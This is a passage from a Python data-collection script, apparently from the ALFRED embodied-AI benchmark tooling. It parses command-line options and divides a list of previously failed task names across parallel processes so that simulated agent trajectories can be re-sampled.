e.g. /data_alfred/", required=True
)
parser.add_argument(
'--save_subdir', type=str, help="subdirectory to save the success & failure trajectories and data, \
e.g. sampled/new_trajectories/", required=True
)
parser.add_argument(
'--splits_dir', type=str, help="where to save the split file",
default='/root/data_alfred/splits/', required=True
)
# debugging settings
parser.add_argument(
'--debug', action='store_true',
help="print agent env actions info per timestep."
)
parser.add_argument(
'--x_display', type=str, required=False, default=constants.X_DISPLAY, help="x_display id"
)
# multi-process settings
parser.add_argument(
"--in_parallel", action='store_true',
help="this collection will run in parallel with others, so load from disk on every new sample"
)
parser.add_argument(
"-n", "--num_processes", type=int, default=0,
help="number of processes for parallel mode"
)
# task params from list of previously failed trajectories
parser.add_argument(
'--task_names_path', type=str, required=True,
help="path to text file. each line is a task name e.g. look_at_obj_in_light-BaseballBat-None-DeskLamp-301"
)
# number of tries
parser.add_argument(
"--repeats_per_cond", type=int,
help='number of successful trajectories we want to collect for each task tuple.',
default=3
)
parser.add_argument(
"--trials_before_fail", type=int,
help='number of tries before we stop trying for the task tuple. (some task tuples can be very challenging.)',
default=5
)
parse_args = parser.parse_args()
parse_args.seed = None
# each trajectory directory is time stamped by the moment we start collecting them
constants.TIME_NOW = parse_args.save_subdir.rstrip('/')[-8:]
parse_args.save_path = os.path.join(parse_args.data_root, parse_args.save_subdir)
constants.DATA_SAVE_PATH = parse_args.save_path
start_time = time.time()
# get task_names from of previously failed tasks from file
with open(parse_args.task_names_path, 'r') as f:
task_names_list = f.read().splitlines()
os.makedirs(parse_args.save_path, exist_ok=True)
task_names_dict = {}
if parse_args.in_parallel and parse_args.num_processes > 1:
# divide task among processes
# TODO: should replace with a proper queue for multi-process
quotient = len(task_names_list) // parse_args.num_processes
for process_i in range(parse_args.num_processes):
task_names_dict[process_i] = task_names_list[process_i*quotient: (process_i+1)*quotient]
if process_i == parse_args.num_processes-1:
task_names_dict[process_i] += task_names_list[(process_i+1)*quotient:]
parallel_main(parse_args)
merge_process_results(parse_args)
else:
task_names_dict[0] = task_names_list
main(parse_args, task_names_dict)
merge_process_results(parse_args)
print('-------------------------------------------------------')
print("Finished sampling, total time:")
print(time.time() - start_time)
|